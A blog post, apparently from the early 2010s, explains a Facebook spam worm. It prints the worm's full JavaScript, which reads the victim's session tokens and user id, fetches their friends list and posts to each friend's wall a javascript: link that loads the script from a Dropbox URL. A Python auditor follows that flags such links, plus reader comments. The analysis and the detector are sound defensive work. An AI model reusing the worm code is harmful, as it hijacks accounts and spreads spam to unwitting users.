So I saw a post on my wall from a friend, but something just didn’t sound right. Again, it was a case of the Facebook spam that somehow tricks you into posting something you didn’t want to post to all of your friends. Many people made the mistake, and it spread fast.
Mainly, it is impressive that these Facebook hackers were able to come up with this. It shows how difficult a problem security is for a big company like Facebook.
The hack was a link, styled to look like Facebook’s own interface, that read “Remove this App” and sat right next to common actions like “Like” or “Comment.” That link was actually a javascript: URL: clicking it ran a malicious piece of JavaScript that fetched a file from Dropbox and copied the same post onto the walls of your friends, each with the same fake link.
I went to look at the file… which was here, http://dl.dropbox.com/u/10505629/verify.js. But then I went back and Dropbox had apparently taken it down about two minutes later. A fast response, but this message had probably already been replicated, idk, a hundred thousand times?
It seems to have been low damage, but it raises interesting security questions when people believe so readily the information that comes from their friends’ Facebook accounts. I just heard yesterday of a case where a friend’s mom’s account had sent out a message about needing help and wiring money, and people fell for it.
I’m posting the js code below, since it is no longer accessible, but with the swearing removed.
==== verify.js ======
```javascript
var message = "-------------------- I hate you and the only way to remove all these posts is by disabling this below.";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "Remove This App";
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){
}else{
  data = eval('(' + gf.responseText.substr(9) + ')');
  if(data.error){
  }else{
    friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
  }
}
for(var i=0 ; i < friends.length ; i++) {
  var httpwp = new XMLHttpRequest();
  var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
  var paramswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message;
  httpwp.open("POST", urlwp, true);
  httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  httpwp.setRequestHeader("Content-length", paramswp.length);
  httpwp.setRequestHeader("Connection", "keep-alive");
  httpwp.onreadystatechange = function(){
    if (httpwp.readyState == 4 && httpwp.status == 200){
    }
  }
  httpwp.send(paramswp);
}
alert("Failed to remove. ----------");
document.location = "";
```
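The thing that makes this worm work is the `javascript:` URL stuffed into the feed post’s action link. Here is an added example (my own, not part of the original script or anything Facebook ships) of the server-side check that would have caught it: it parses a request body shaped like the one above and flags an action-link href whose scheme is `javascript:` and whose code pulls in a remote script. The parameter names come from the worm’s request; the sample bodies are constructed for the test, and the host `example.invalid` is a placeholder.

```python
"""Audit a prompt_feed-style request body for the javascript: action-link trick."""
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Parameter names as they appear in the worm's POST body (see verify.js above).
ACTION_HREF = "feed_info[action_links][0][href]"
NO_SESSION = "feed_info[app_has_no_session]"
TARGET = "to_ids[0]"

# Signs that a javascript: payload is a remote-script loader rather than an inline widget.
REMOTE_LOADER = re.compile(r"createElement\(['\"]script['\"]\)", re.I)
REMOTE_SRC = re.compile(r"\.src\s*=\s*['\"](?:https?:)?//", re.I)


def audit_feed_body(body: str) -> list[str]:
    """Return human-readable findings for one request body; [] means nothing suspicious."""
    params = parse_qs(body, keep_blank_values=True)  # decodes the encodeURIComponent'd href
    findings = []
    for href in params.get(ACTION_HREF, []):
        scheme = urlparse(href.strip()).scheme  # urlsplit lowercases the scheme
        if scheme == "javascript":
            findings.append("action link href uses javascript: scheme")
            if REMOTE_LOADER.search(href) and REMOTE_SRC.search(href):
                findings.append("javascript: payload injects a remote <script>")
        elif scheme not in ("http", "https"):
            findings.append(f"action link href has unexpected scheme {scheme!r}")
    # Posting to someone else's feed while claiming no app session is the propagation pattern.
    if params.get(NO_SESSION) == ["true"] and params.get(TARGET):
        findings.append("post targets another user's feed without an app session")
    return findings


# Constructed sample bodies (not captured traffic). The malicious one mirrors the worm's shape.
SAMPLE_MALICIOUS = urlencode({
    "post_form_id": "CONSTRUCTED_FORM_ID",
    ACTION_HREF: "javascript:(function(){var s=document.createElement('script');"
                 "s.src='http://example.invalid/verify.js';document.head.appendChild(s);})();",
    "feed_info[action_links][0][text]": "Remove This App",
    NO_SESSION: "true",
    TARGET: "1000000001",
})
SAMPLE_BENIGN = urlencode({
    "post_form_id": "CONSTRUCTED_FORM_ID",
    ACTION_HREF: "https://apps.example.invalid/remove",
    "feed_info[action_links][0][text]": "Remove This App",
    NO_SESSION: "false",
})

if __name__ == "__main__":
    for name, body in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, audit_feed_body(body) or "clean")
```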
Haha we were talking about this the other day–I’m glad you figured out how it worked!
please explain what the 2 blocks of code are for. i see the first is verify.js; what’s the second, and should i attempt to use it lol
is good, is i perfect ok
i love page